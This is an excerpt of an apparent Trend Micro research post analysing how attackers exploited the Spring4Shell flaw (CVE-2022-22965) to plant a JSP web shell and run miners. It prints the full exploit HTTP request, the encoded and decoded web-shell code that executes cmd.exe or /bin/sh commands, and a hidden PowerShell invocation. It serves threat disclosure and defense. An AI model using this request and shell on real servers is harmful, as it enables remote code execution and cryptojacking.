Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Trend Micro -

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners.

The following code is used to create the web shell:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip  

The web shell’s content is URL-encoded using the following code:

%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F +new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22- c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di  

After decoding, the resulting payload is a Spring4Shell web shell:

%{x}i try {Runtime.getRuntime().exec(System.getProperty(“os.name”).contains(“ndo”) ? new String[]{“cmd.exe”, “/c”, request.getParameter(“w”)} : new String[]{“/bin/sh”, “-c”, request.getParameter(“l”)});} catch (Exception e) {};out.print(“@pong”); %{z}I  

Before executing the payload, the malicious actors first have to determine the operating system of the machine they are infecting. They do this using a string check to see if “os.name” contains the word “ndo”. If it does, then the machine is identified as Windows-based, otherwise the machine is identified as Linux-based.

Once the operating system is identified, the encoded payload is executed. The exploit uniform resource identifier (URI) containing the web shell path and parameters is shown in the following code:

/zbc0fb.jsp?w=powershell.exe+-NonI+-W+Hidden+-NoP+-Exec+Bypass+-Enc+<base64 encoded content>

Read More: https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html